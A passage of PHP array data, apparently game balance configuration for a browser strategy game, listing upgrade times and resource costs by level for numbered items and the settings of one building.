array ('time_consume' => 132480, 'resources' => array( '1' => 11610, '2' => 12320, '3' => 16865, '4' => 7270)),

array ('time_consume' => 139680, 'resources' => array( '1' => 12125, '2' => 12865, '3' => 17610, '4' => 7590)),

array ('time_consume' => 146880, 'resources' => array( '1' => 12635, '2' => 13400, '3' => 18345, '4' => 7910)),


'54'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 540, '2' => 610, '3' => 170, '4' => 220)),

array ('time_consume' => 17280, 'resources' => array( '1' => 940, '2' => 1060, '3' => 295, '4' => 385)),

array ('time_consume' => 24480, 'resources' => array( '1' => 1300, '2' => 1470, '3' => 410, '4' => 530)),

array ('time_consume' => 31680, 'resources' => array( '1' => 1635, '2' => 1850, '3' => 515, '4' => 665)),

array ('time_consume' => 38880, 'resources' => array( '1' => 1955, '2' => 2210, '3' => 615, '4' => 795)),

array ('time_consume' => 46080, 'resources' => array( '1' => 2265, '2' => 2560, '3' => 715, '4' => 920)),

array ('time_consume' => 53280, 'resources' => array( '1' => 2560, '2' => 2895, '3' => 805, '4' => 1045)),

array ('time_consume' => 60480, 'resources' => array( '1' => 2850, '2' => 3220, '3' => 895, '4' => 1160)),

array ('time_consume' => 67680, 'resources' => array( '1' => 3130, '2' => 3540, '3' => 985, '4' => 1275)),

array ('time_consume' => 74880, 'resources' => array( '1' => 3405, '2' => 3850, '3' => 1075, '4' => 1390)),

array ('time_consume' => 82080, 'resources' => array( '1' => 3675, '2' => 4155, '3' => 1160, '4' => 1500)),

array ('time_consume' => 89280, 'resources' => array( '1' => 3940, '2' => 4455, '3' => 1240, '4' => 1605)),

array ('time_consume' => 96480, 'resources' => array( '1' => 4205, '2' => 4750, '3' => 1325, '4' => 1710)),

array ('time_consume' => 103680, 'resources' => array( '1' => 4460, '2' => 5040, '3' => 1405, '4' => 1815)),

array ('time_consume' => 110880, 'resources' => array( '1' => 4715, '2' => 5325, '3' => 1485, '4' => 1920)),

array ('time_consume' => 118080, 'resources' => array( '1' => 4960, '2' => 5605, '3' => 1560, '4' => 2020)),

array ('time_consume' => 125280, 'resources' => array( '1' => 5210, '2' => 5885, '3' => 1640, '4' => 2120)),

array ('time_consume' => 132480, 'resources' => array( '1' => 5455, '2' => 6160, '3' => 1715, '4' => 2220)),

array ('time_consume' => 139680, 'resources' => array( '1' => 5695, '2' => 6430, '3' => 1790, '4' => 2320)),

array ('time_consume' => 146880, 'resources' => array( '1' => 5930, '2' => 6700, '3' => 1870, '4' => 2415)),


'55'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1315, '2' => 1060, '3' => 815, '4' => 285)),

array ('time_consume' => 17280, 'resources' => array( '1' => 2290, '2' => 1845, '3' => 1415, '4' => 500)),

array ('time_consume' => 24480, 'resources' => array( '1' => 3170, '2' => 2555, '3' => 1960, '4' => 690)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3990, '2' => 3215, '3' => 2465, '4' => 870)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4770, '2' => 3840, '3' => 2945, '4' => 1040)),

array ('time_consume' => 46080, 'resources' => array( '1' => 5520, '2' => 4445, '3' => 3410, '4' => 1200)),

array ('time_consume' => 53280, 'resources' => array( '1' => 6245, '2' => 5030, '3' => 3860, '4' => 1360)),

array ('time_consume' => 60480, 'resources' => array( '1' => 6950, '2' => 5595, '3' => 4295, '4' => 1515)),

array ('time_consume' => 67680, 'resources' => array( '1' => 7635, '2' => 6150, '3' => 4715, '4' => 1665)),

array ('time_consume' => 74880, 'resources' => array( '1' => 8310, '2' => 6690, '3' => 5130, '4' => 1810)),

array ('time_consume' => 82080, 'resources' => array( '1' => 8965, '2' => 7220, '3' => 5540, '4' => 1950)),

array ('time_consume' => 89280, 'resources' => array( '1' => 9610, '2' => 7740, '3' => 5940, '4' => 2095)),

array ('time_consume' => 96480, 'resources' => array( '1' => 10250, '2' => 8250, '3' => 6330, '4' => 2230)),

array ('time_consume' => 103680, 'resources' => array( '1' => 10875, '2' => 8755, '3' => 6715, '4' => 2365)),

array ('time_consume' => 110880, 'resources' => array( '1' => 11490, '2' => 9250, '3' => 7100, '4' => 2500)),

array ('time_consume' => 118080, 'resources' => array( '1' => 12100, '2' => 9740, '3' => 7475, '4' => 2635)),

array ('time_consume' => 125280, 'resources' => array( '1' => 12700, '2' => 10225, '3' => 7845, '4' => 2765)),

array ('time_consume' => 132480, 'resources' => array( '1' => 13295, '2' => 10705, '3' => 8215, '4' => 2895)),

array ('time_consume' => 139680, 'resources' => array( '1' => 13885, '2' => 11175, '3' => 8575, '4' => 3025)),

array ('time_consume' => 146880, 'resources' => array( '1' => 14465, '2' => 11645, '3' => 8935, '4' => 3150)),


'56'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 990, '2' => 1145, '3' => 1450, '4' => 355)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1720, '2' => 1995, '3' => 2525, '4' => 620)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2380, '2' => 2755, '3' => 3490, '4' => 855)),

array ('time_consume' => 31680, 'resources' => array( '1' => 2995, '2' => 3470, '3' => 4395, '4' => 1075)),

array ('time_consume' => 38880, 'resources' => array( '1' => 3580, '2' => 4150, '3' => 5255, '4' => 1285)),

array ('time_consume' => 46080, 'resources' => array( '1' => 4140, '2' => 4800, '3' => 6080, '4' => 1490)),

array ('time_consume' => 53280, 'resources' => array( '1' => 4685, '2' => 5430, '3' => 6880, '4' => 1685)),

array ('time_consume' => 60480, 'resources' => array( '1' => 5210, '2' => 6045, '3' => 7655, '4' => 1875)),

array ('time_consume' => 67680, 'resources' => array( '1' => 5725, '2' => 6640, '3' => 8410, '4' => 2060)),

array ('time_consume' => 74880, 'resources' => array( '1' => 6230, '2' => 7225, '3' => 9150, '4' => 2240)),

array ('time_consume' => 82080, 'resources' => array( '1' => 6725, '2' => 7795, '3' => 9875, '4' => 2415)),

array ('time_consume' => 89280, 'resources' => array( '1' => 7210, '2' => 8360, '3' => 10585, '4' => 2590)),

array ('time_consume' => 96480, 'resources' => array( '1' => 7685, '2' => 8910, '3' => 11285, '4' => 2765)),

array ('time_consume' => 103680, 'resources' => array( '1' => 8155, '2' => 9455, '3' => 11975, '4' => 2930)),

array ('time_consume' => 110880, 'resources' => array( '1' => 8620, '2' => 9995, '3' => 12655, '4' => 3100)),

array ('time_consume' => 118080, 'resources' => array( '1' => 9075, '2' => 10520, '3' => 13325, '4' => 3260)),

array ('time_consume' => 125280, 'resources' => array( '1' => 9525, '2' => 11045, '3' => 13985, '4' => 3425)),

array ('time_consume' => 132480, 'resources' => array( '1' => 9970, '2' => 11560, '3' => 14640, '4' => 3585)),

array ('time_consume' => 139680, 'resources' => array( '1' => 10410, '2' => 12075, '3' => 15290, '4' => 3745)),

array ('time_consume' => 146880, 'resources' => array( '1' => 10850, '2' => 12580, '3' => 15930, '4' => 3900)),


'57'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 2135, '2' => 875, '3' => 1235, '4' => 215)),

array ('time_consume' => 17280, 'resources' => array( '1' => 3715, '2' => 1520, '3' => 2145, '4' => 375)),

array ('time_consume' => 24480, 'resources' => array( '1' => 5140, '2' => 2105, '3' => 2970, '4' => 520)),

array ('time_consume' => 31680, 'resources' => array( '1' => 6465, '2' => 2645, '3' => 3740, '4' => 655)),

array ('time_consume' => 38880, 'resources' => array( '1' => 7730, '2' => 3165, '3' => 4470, '4' => 785)),

array ('time_consume' => 46080, 'resources' => array( '1' => 8945, '2' => 3660, '3' => 5170, '4' => 910)),

array ('time_consume' => 53280, 'resources' => array( '1' => 10120, '2' => 4140, '3' => 5850, '4' => 1030)),

array ('time_consume' => 60480, 'resources' => array( '1' => 11260, '2' => 4610, '3' => 6510, '4' => 1145)),

array ('time_consume' => 67680, 'resources' => array( '1' => 12370, '2' => 5065, '3' => 7155, '4' => 1255)),

array ('time_consume' => 74880, 'resources' => array( '1' => 13460, '2' => 5510, '3' => 7780, '4' => 1365)),

array ('time_consume' => 82080, 'resources' => array( '1' => 14525, '2' => 5945, '3' => 8400, '4' => 1475)),

array ('time_consume' => 89280, 'resources' => array( '1' => 15575, '2' => 6375, '3' => 9005, '4' => 1580)),

array ('time_consume' => 96480, 'resources' => array( '1' => 16605, '2' => 6795, '3' => 9600, '4' => 1685)),

array ('time_consume' => 103680, 'resources' => array( '1' => 17620, '2' => 7210, '3' => 10185, '4' => 1790)),

array ('time_consume' => 110880, 'resources' => array( '1' => 18620, '2' => 7620, '3' => 10765, '4' => 1890)),

array ('time_consume' => 118080, 'resources' => array( '1' => 19605, '2' => 8025, '3' => 11335, '4' => 1990)),

array ('time_consume' => 125280, 'resources' => array( '1' => 20580, '2' => 8425, '3' => 11895, '4' => 2090)),

array ('time_consume' => 132480, 'resources' => array( '1' => 21540, '2' => 8820, '3' => 12455, '4' => 2190)),

array ('time_consume' => 139680, 'resources' => array( '1' => 22495, '2' => 9210, '3' => 13005, '4' => 2285)),

array ('time_consume' => 146880, 'resources' => array( '1' => 23435, '2' => 9595, '3' => 13550, '4' => 2380)),


'58'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1125, '2' => 1590, '3' => 735, '4' => 130)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1960, '2' => 2770, '3' => 1275, '4' => 230)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2710, '2' => 3835, '3' => 1765, '4' => 315)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3410, '2' => 4825, '3' => 2225, '4' => 400)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4075, '2' => 5770, '3' => 2660, '4' => 475)),

array ('time_consume' => 46080, 'resources' => array( '1' => 4715, '2' => 6675, '3' => 3075, '4' => 550)),

array ('time_consume' => 53280, 'resources' => array( '1' => 5335, '2' => 7550, '3' => 3480, '4' => 625)),

array ('time_consume' => 60480, 'resources' => array( '1' => 5940, '2' => 8400, '3' => 3870, '4' => 695)),

array ('time_consume' => 67680, 'resources' => array( '1' => 6525, '2' => 9230, '3' => 4255, '4' => 765)),

array ('time_consume' => 74880, 'resources' => array( '1' => 7100, '2' => 10045, '3' => 4625, '4' => 830)),

array ('time_consume' => 82080, 'resources' => array( '1' => 7660, '2' => 10840, '3' => 4995, '4' => 895)),

array ('time_consume' => 89280, 'resources' => array( '1' => 8215, '2' => 11620, '3' => 5355, '4' => 960)),

array ('time_consume' => 96480, 'resources' => array( '1' => 8755, '2' => 12390, '3' => 5710, '4' => 1025)),

array ('time_consume' => 103680, 'resources' => array( '1' => 9290, '2' => 13145, '3' => 6055, '4' => 1085)),

array ('time_consume' => 110880, 'resources' => array( '1' => 9820, '2' => 13890, '3' => 6400, '4' => 1150)),

array ('time_consume' => 118080, 'resources' => array( '1' => 10340, '2' => 14625, '3' => 6740, '4' => 1210)),

array ('time_consume' => 125280, 'resources' => array( '1' => 10850, '2' => 15355, '3' => 7075, '4' => 1270)),

array ('time_consume' => 132480, 'resources' => array( '1' => 11360, '2' => 16070, '3' => 7405, '4' => 1330)),

array ('time_consume' => 139680, 'resources' => array( '1' => 11860, '2' => 16780, '3' => 7730, '4' => 1390)),

array ('time_consume' => 146880, 'resources' => array( '1' => 12360, '2' => 17485, '3' => 8055, '4' => 1445)),


'100'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 940, '2' => 800, '3' => 1250, '4' => 370)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1635, '2' => 1395, '3' => 2175, '4' => 645)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2265, '2' => 1925, '3' => 3010, '4' => 890)),

array ('time_consume' => 31680, 'resources' => array( '1' => 2850, '2' => 2425, '3' => 3790, '4' => 1120)),

array ('time_consume' => 38880, 'resources' => array( '1' => 3405, '2' => 2900, '3' => 4530, '4' => 1340)),

array ('time_consume' => 46080, 'resources' => array( '1' => 3940, '2' => 3355, '3' => 5240, '4' => 1550)),

array ('time_consume' => 53280, 'resources' => array( '1' => 4460, '2' => 3795, '3' => 5930, '4' => 1755)),

array ('time_consume' => 60480, 'resources' => array( '1' => 4960, '2' => 4220, '3' => 6600, '4' => 1955)),

array ('time_consume' => 67680, 'resources' => array( '1' => 5450, '2' => 4640, '3' => 7250, '4' => 2145)),

array ('time_consume' => 74880, 'resources' => array( '1' => 5930, '2' => 5050, '3' => 7885, '4' => 2335)),

array ('time_consume' => 82080, 'resources' => array( '1' => 6400, '2' => 5450, '3' => 8510, '4' => 2520)),

array ('time_consume' => 89280, 'resources' => array( '1' => 6860, '2' => 5840, '3' => 9125, '4' => 2700)),

array ('time_consume' => 96480, 'resources' => array( '1' => 7315, '2' => 6225, '3' => 9730, '4' => 2880)),

array ('time_consume' => 103680, 'resources' => array( '1' => 7765, '2' => 6605, '3' => 10325, '4' => 3055)),

array ('time_consume' => 110880, 'resources' => array( '1' => 8205, '2' => 6980, '3' => 10910, '4' => 3230)),

array ('time_consume' => 118080, 'resources' => array( '1' => 8640, '2' => 7350, '3' => 11485, '4' => 3400)),

array ('time_consume' => 125280, 'resources' => array( '1' => 9065, '2' => 7715, '3' => 12060, '4' => 3570)),

array ('time_consume' => 132480, 'resources' => array( '1' => 9490, '2' => 8080, '3' => 12620, '4' => 3735)),

array ('time_consume' => 139680, 'resources' => array( '1' => 9910, '2' => 8435, '3' => 13180, '4' => 3900)),

array ('time_consume' => 146880, 'resources' => array( '1' => 10325, '2' => 8790, '3' => 13730, '4' => 4065)),


'101'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 800, '2' => 1010, '3' => 1320, '4' => 650)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1395, '2' => 1760, '3' => 2300, '4' => 1130)),

array ('time_consume' => 24480, 'resources' => array( '1' => 1925, '2' => 2430, '3' => 3180, '4' => 1565)),

array ('time_consume' => 31680, 'resources' => array( '1' => 2425, '2' => 3060, '3' => 4000, '4' => 1970)),

array ('time_consume' => 38880, 'resources' => array( '1' => 2900, '2' => 3660, '3' => 4785, '4' => 2355)),

array ('time_consume' => 46080, 'resources' => array( '1' => 3355, '2' => 4235, '3' => 5535, '4' => 2725)),

array ('time_consume' => 53280, 'resources' => array( '1' => 3795, '2' => 4790, '3' => 6260, '4' => 3085)),

array ('time_consume' => 60480, 'resources' => array( '1' => 4220, '2' => 5330, '3' => 6965, '4' => 3430)),

array ('time_consume' => 67680, 'resources' => array( '1' => 4640, '2' => 5860, '3' => 7655, '4' => 3770)),

array ('time_consume' => 74880, 'resources' => array( '1' => 5050, '2' => 6375, '3' => 8330, '4' => 4100)),

array ('time_consume' => 82080, 'resources' => array( '1' => 5450, '2' => 6880, '3' => 8990, '4' => 4425)),

array ('time_consume' => 89280, 'resources' => array( '1' => 5840, '2' => 7375, '3' => 9635, '4' => 4745)),

array ('time_consume' => 96480, 'resources' => array( '1' => 6225, '2' => 7860, '3' => 10275, '4' => 5060)),

array ('time_consume' => 103680, 'resources' => array( '1' => 6605, '2' => 8340, '3' => 10900, '4' => 5370)),

array ('time_consume' => 110880, 'resources' => array( '1' => 6980, '2' => 8815, '3' => 11520, '4' => 5675)),

array ('time_consume' => 118080, 'resources' => array( '1' => 7350, '2' => 9280, '3' => 12130, '4' => 5975)),

array ('time_consume' => 125280, 'resources' => array( '1' => 7715, '2' => 9745, '3' => 12735, '4' => 6270)),

array ('time_consume' => 132480, 'resources' => array( '1' => 8080, '2' => 10200, '3' => 13330, '4' => 6565)),

array ('time_consume' => 139680, 'resources' => array( '1' => 8435, '2' => 10650, '3' => 13920, '4' => 6855)),

array ('time_consume' => 146880, 'resources' => array( '1' => 8790, '2' => 11095, '3' => 14500, '4' => 7140)),


'102'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1150, '2' => 1220, '3' => 1670, '4' => 720)),

array ('time_consume' => 17280, 'resources' => array( '1' => 2000, '2' => 2125, '3' => 2910, '4' => 1255)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2770, '2' => 2940, '3' => 4020, '4' => 1735)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3485, '2' => 3700, '3' => 5060, '4' => 2185)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4165, '2' => 4420, '3' => 6050, '4' => 2610)),

array ('time_consume' => 46080, 'resources' => array( '1' => 4820, '2' => 5115, '3' => 7000, '4' => 3020)),

array ('time_consume' => 53280, 'resources' => array( '1' => 5455, '2' => 5785, '3' => 7920, '4' => 3415)),

array ('time_consume' => 60480, 'resources' => array( '1' => 6070, '2' => 6440, '3' => 8815, '4' => 3800)),

array ('time_consume' => 67680, 'resources' => array( '1' => 6670, '2' => 7075, '3' => 9685, '4' => 4175)),

array ('time_consume' => 74880, 'resources' => array( '1' => 7255, '2' => 7700, '3' => 10535, '4' => 4545)),

array ('time_consume' => 82080, 'resources' => array( '1' => 7830, '2' => 8310, '3' => 11370, '4' => 4905)),

array ('time_consume' => 89280, 'resources' => array( '1' => 8395, '2' => 8905, '3' => 12190, '4' => 5255)),

array ('time_consume' => 96480, 'resources' => array( '1' => 8950, '2' => 9495, '3' => 13000, '4' => 5605)),

array ('time_consume' => 103680, 'resources' => array( '1' => 9495, '2' => 10075, '3' => 13790, '4' => 5945)),

array ('time_consume' => 110880, 'resources' => array( '1' => 10035, '2' => 10645, '3' => 14575, '4' => 6285)),

array ('time_consume' => 118080, 'resources' => array( '1' => 10570, '2' => 11210, '3' => 15345, '4' => 6615)),

array ('time_consume' => 125280, 'resources' => array( '1' => 11095, '2' => 11770, '3' => 16110, '4' => 6945)),

array ('time_consume' => 132480, 'resources' => array( '1' => 11610, '2' => 12320, '3' => 16865, '4' => 7270)),

array ('time_consume' => 139680, 'resources' => array( '1' => 12125, '2' => 12865, '3' => 17610, '4' => 7590)),

array ('time_consume' => 146880, 'resources' => array( '1' => 12635, '2' => 13400, '3' => 18345, '4' => 7910)),


'103'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 540, '2' => 610, '3' => 170, '4' => 220)),

array ('time_consume' => 17280, 'resources' => array( '1' => 940, '2' => 1060, '3' => 295, '4' => 385)),

array ('time_consume' => 24480, 'resources' => array( '1' => 1300, '2' => 1470, '3' => 410, '4' => 530)),

array ('time_consume' => 31680, 'resources' => array( '1' => 1635, '2' => 1850, '3' => 515, '4' => 665)),

array ('time_consume' => 38880, 'resources' => array( '1' => 1955, '2' => 2210, '3' => 615, '4' => 795)),

array ('time_consume' => 46080, 'resources' => array( '1' => 2265, '2' => 2560, '3' => 715, '4' => 920)),

array ('time_consume' => 53280, 'resources' => array( '1' => 2560, '2' => 2895, '3' => 805, '4' => 1045)),

array ('time_consume' => 60480, 'resources' => array( '1' => 2850, '2' => 3220, '3' => 895, '4' => 1160)),

array ('time_consume' => 67680, 'resources' => array( '1' => 3130, '2' => 3540, '3' => 985, '4' => 1275)),

array ('time_consume' => 74880, 'resources' => array( '1' => 3405, '2' => 3850, '3' => 1075, '4' => 1390)),

array ('time_consume' => 82080, 'resources' => array( '1' => 3675, '2' => 4155, '3' => 1160, '4' => 1500)),

array ('time_consume' => 89280, 'resources' => array( '1' => 3940, '2' => 4455, '3' => 1240, '4' => 1605)),

array ('time_consume' => 96480, 'resources' => array( '1' => 4205, '2' => 4750, '3' => 1325, '4' => 1710)),

array ('time_consume' => 103680, 'resources' => array( '1' => 4460, '2' => 5040, '3' => 1405, '4' => 1815)),

array ('time_consume' => 110880, 'resources' => array( '1' => 4715, '2' => 5325, '3' => 1485, '4' => 1920)),

array ('time_consume' => 118080, 'resources' => array( '1' => 4960, '2' => 5605, '3' => 1560, '4' => 2020)),

array ('time_consume' => 125280, 'resources' => array( '1' => 5210, '2' => 5885, '3' => 1640, '4' => 2120)),

array ('time_consume' => 132480, 'resources' => array( '1' => 5455, '2' => 6160, '3' => 1715, '4' => 2220)),

array ('time_consume' => 139680, 'resources' => array( '1' => 5695, '2' => 6430, '3' => 1790, '4' => 2320)),

array ('time_consume' => 146880, 'resources' => array( '1' => 5930, '2' => 6700, '3' => 1870, '4' => 2415)),


'104'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1315, '2' => 1060, '3' => 815, '4' => 285)),

array ('time_consume' => 17280, 'resources' => array( '1' => 2290, '2' => 1845, '3' => 1415, '4' => 500)),

array ('time_consume' => 24480, 'resources' => array( '1' => 3170, '2' => 2555, '3' => 1960, '4' => 690)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3990, '2' => 3215, '3' => 2465, '4' => 870)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4770, '2' => 3840, '3' => 2945, '4' => 1040)),

array ('time_consume' => 46080, 'resources' => array( '1' => 5520, '2' => 4445, '3' => 3410, '4' => 1200)),

array ('time_consume' => 53280, 'resources' => array( '1' => 6245, '2' => 5030, '3' => 3860, '4' => 1360)),

array ('time_consume' => 60480, 'resources' => array( '1' => 6950, '2' => 5595, '3' => 4295, '4' => 1515)),

array ('time_consume' => 67680, 'resources' => array( '1' => 7635, '2' => 6150, '3' => 4715, '4' => 1665)),

array ('time_consume' => 74880, 'resources' => array( '1' => 8310, '2' => 6690, '3' => 5130, '4' => 1810)),

array ('time_consume' => 82080, 'resources' => array( '1' => 8965, '2' => 7220, '3' => 5540, '4' => 1950)),

array ('time_consume' => 89280, 'resources' => array( '1' => 9610, '2' => 7740, '3' => 5940, '4' => 2095)),

array ('time_consume' => 96480, 'resources' => array( '1' => 10250, '2' => 8250, '3' => 6330, '4' => 2230)),

array ('time_consume' => 103680, 'resources' => array( '1' => 10875, '2' => 8755, '3' => 6715, '4' => 2365)),

array ('time_consume' => 110880, 'resources' => array( '1' => 11490, '2' => 9250, '3' => 7100, '4' => 2500)),

array ('time_consume' => 118080, 'resources' => array( '1' => 12100, '2' => 9740, '3' => 7475, '4' => 2635)),

array ('time_consume' => 125280, 'resources' => array( '1' => 12700, '2' => 10225, '3' => 7845, '4' => 2765)),

array ('time_consume' => 132480, 'resources' => array( '1' => 13295, '2' => 10705, '3' => 8215, '4' => 2895)),

array ('time_consume' => 139680, 'resources' => array( '1' => 13885, '2' => 11175, '3' => 8575, '4' => 3025)),

array ('time_consume' => 146880, 'resources' => array( '1' => 14465, '2' => 11645, '3' => 8935, '4' => 3150)),


'105'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 990, '2' => 1145, '3' => 1450, '4' => 355)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1720, '2' => 1995, '3' => 2525, '4' => 620)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2380, '2' => 2755, '3' => 3490, '4' => 855)),

array ('time_consume' => 31680, 'resources' => array( '1' => 2995, '2' => 3470, '3' => 4395, '4' => 1075)),

array ('time_consume' => 38880, 'resources' => array( '1' => 3580, '2' => 4150, '3' => 5255, '4' => 1285)),

array ('time_consume' => 46080, 'resources' => array( '1' => 4140, '2' => 4800, '3' => 6080, '4' => 1490)),

array ('time_consume' => 53280, 'resources' => array( '1' => 4685, '2' => 5430, '3' => 6880, '4' => 1685)),

array ('time_consume' => 60480, 'resources' => array( '1' => 5210, '2' => 6045, '3' => 7655, '4' => 1875)),

array ('time_consume' => 67680, 'resources' => array( '1' => 5725, '2' => 6640, '3' => 8410, '4' => 2060)),

array ('time_consume' => 74880, 'resources' => array( '1' => 6230, '2' => 7225, '3' => 9150, '4' => 2240)),

array ('time_consume' => 82080, 'resources' => array( '1' => 6725, '2' => 7795, '3' => 9875, '4' => 2415)),

array ('time_consume' => 89280, 'resources' => array( '1' => 7210, '2' => 8360, '3' => 10585, '4' => 2590)),

array ('time_consume' => 96480, 'resources' => array( '1' => 7685, '2' => 8910, '3' => 11285, '4' => 2765)),

array ('time_consume' => 103680, 'resources' => array( '1' => 8155, '2' => 9455, '3' => 11975, '4' => 2930)),

array ('time_consume' => 110880, 'resources' => array( '1' => 8620, '2' => 9995, '3' => 12655, '4' => 3100)),

array ('time_consume' => 118080, 'resources' => array( '1' => 9075, '2' => 10520, '3' => 13325, '4' => 3260)),

array ('time_consume' => 125280, 'resources' => array( '1' => 9525, '2' => 11045, '3' => 13985, '4' => 3425)),

array ('time_consume' => 132480, 'resources' => array( '1' => 9970, '2' => 11560, '3' => 14640, '4' => 3585)),

array ('time_consume' => 139680, 'resources' => array( '1' => 10410, '2' => 12075, '3' => 15290, '4' => 3745)),

array ('time_consume' => 146880, 'resources' => array( '1' => 10850, '2' => 12580, '3' => 15930, '4' => 3900)),


'106'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 2135, '2' => 875, '3' => 1235, '4' => 215)),

array ('time_consume' => 17280, 'resources' => array( '1' => 3715, '2' => 1520, '3' => 2145, '4' => 375)),

array ('time_consume' => 24480, 'resources' => array( '1' => 5140, '2' => 2105, '3' => 2970, '4' => 520)),

array ('time_consume' => 31680, 'resources' => array( '1' => 6465, '2' => 2645, '3' => 3740, '4' => 655)),

array ('time_consume' => 38880, 'resources' => array( '1' => 7730, '2' => 3165, '3' => 4470, '4' => 785)),

array ('time_consume' => 46080, 'resources' => array( '1' => 8945, '2' => 3660, '3' => 5170, '4' => 910)),

array ('time_consume' => 53280, 'resources' => array( '1' => 10120, '2' => 4140, '3' => 5850, '4' => 1030)),

array ('time_consume' => 60480, 'resources' => array( '1' => 11260, '2' => 4610, '3' => 6510, '4' => 1145)),

array ('time_consume' => 67680, 'resources' => array( '1' => 12370, '2' => 5065, '3' => 7155, '4' => 1255)),

array ('time_consume' => 74880, 'resources' => array( '1' => 13460, '2' => 5510, '3' => 7780, '4' => 1365)),

array ('time_consume' => 82080, 'resources' => array( '1' => 14525, '2' => 5945, '3' => 8400, '4' => 1475)),

array ('time_consume' => 89280, 'resources' => array( '1' => 15575, '2' => 6375, '3' => 9005, '4' => 1580)),

array ('time_consume' => 96480, 'resources' => array( '1' => 16605, '2' => 6795, '3' => 9600, '4' => 1685)),

array ('time_consume' => 103680, 'resources' => array( '1' => 17620, '2' => 7210, '3' => 10185, '4' => 1790)),

array ('time_consume' => 110880, 'resources' => array( '1' => 18620, '2' => 7620, '3' => 10765, '4' => 1890)),

array ('time_consume' => 118080, 'resources' => array( '1' => 19605, '2' => 8025, '3' => 11335, '4' => 1990)),

array ('time_consume' => 125280, 'resources' => array( '1' => 20580, '2' => 8425, '3' => 11895, '4' => 2090)),

array ('time_consume' => 132480, 'resources' => array( '1' => 21540, '2' => 8820, '3' => 12455, '4' => 2190)),

array ('time_consume' => 139680, 'resources' => array( '1' => 22495, '2' => 9210, '3' => 13005, '4' => 2285)),

array ('time_consume' => 146880, 'resources' => array( '1' => 23435, '2' => 9595, '3' => 13550, '4' => 2380)),


'107'=> array (

array ('time_consume' => 10080, 'resources' => array( '1' => 1125, '2' => 1590, '3' => 735, '4' => 130)),

array ('time_consume' => 17280, 'resources' => array( '1' => 1960, '2' => 2770, '3' => 1275, '4' => 230)),

array ('time_consume' => 24480, 'resources' => array( '1' => 2710, '2' => 3835, '3' => 1765, '4' => 315)),

array ('time_consume' => 31680, 'resources' => array( '1' => 3410, '2' => 4825, '3' => 2225, '4' => 400)),

array ('time_consume' => 38880, 'resources' => array( '1' => 4075, '2' => 5770, '3' => 2660, '4' => 475)),

array ('time_consume' => 46080, 'resources' => array( '1' => 4715, '2' => 6675, '3' => 3075, '4' => 550)),

array ('time_consume' => 53280, 'resources' => array( '1' => 5335, '2' => 7550, '3' => 3480, '4' => 625)),

array ('time_consume' => 60480, 'resources' => array( '1' => 5940, '2' => 8400, '3' => 3870, '4' => 695)),

array ('time_consume' => 67680, 'resources' => array( '1' => 6525, '2' => 9230, '3' => 4255, '4' => 765)),

array ('time_consume' => 74880, 'resources' => array( '1' => 7100, '2' => 10045, '3' => 4625, '4' => 830)),

array ('time_consume' => 82080, 'resources' => array( '1' => 7660, '2' => 10840, '3' => 4995, '4' => 895)),

array ('time_consume' => 89280, 'resources' => array( '1' => 8215, '2' => 11620, '3' => 5355, '4' => 960)),

array ('time_consume' => 96480, 'resources' => array( '1' => 8755, '2' => 12390, '3' => 5710, '4' => 1025)),

array ('time_consume' => 103680, 'resources' => array( '1' => 9290, '2' => 13145, '3' => 6055, '4' => 1085)),

array ('time_consume' => 110880, 'resources' => array( '1' => 9820, '2' => 13890, '3' => 6400, '4' => 1150)),

array ('time_consume' => 118080, 'resources' => array( '1' => 10340, '2' => 14625, '3' => 6740, '4' => 1210)),

array ('time_consume' => 125280, 'resources' => array( '1' => 10850, '2' => 15355, '3' => 7075, '4' => 1270)),

array ('time_consume' => 132480, 'resources' => array( '1' => 11360, '2' => 16070, '3' => 7405, '4' => 1330)),

array ('time_consume' => 139680, 'resources' => array( '1' => 11860, '2' => 16780, '3' => 7730, '4' => 1390)),

array ('time_consume' => 146880, 'resources' => array( '1' => 12360, '2' => 17485, '3' => 8055, '4' => 1445)),



'support_multiple' => FALSE, 'built_in_capital' => TRUE, 'built_in_non_capital' => TRUE, 'built_in_special_only' => FALSE, 'max_lvl_in_non_capital' => NULL,

'for_tribe_id' => array( '1' => 1, '2' => 1, '3' => 1, '4' => 1, '6' => 1, '7' => 1 ),

'pre_requests' => array( '15' => 3, '22' => 3 ),

'levels'=> array(


'value' => 102, 'time_consume' => 2000, 'cp' => 2, 'people_inc' => 4,

'resources' => array( '1' => 340, '2' => 400, '3' => 760, '4' => 260 )



'value' => 104, 'time_consume' => 2620, 'cp' => 3, 'people_inc' => 2,

'resources' => array( '1' => 440, '2' => 510, '3' => 970, '4' => 330 )



'value' => 106, 'time_consume' => 3340, 'cp' => 3, 'people_inc' => 2,

'resources' => array( '1' => 560, '2' => 660, '3' => 1250, '4' => 430 )



'value' => 108, 'time_consume' => 4170, 'cp' => 4, 'people_inc' => 2,

'resources' => array( '1' => 710, '2' => 840, '3' => 1590, '4' => 550 )



'value' => 110, 'time_consume' => 5140, 'cp' => 5, 'people_inc' => 2,

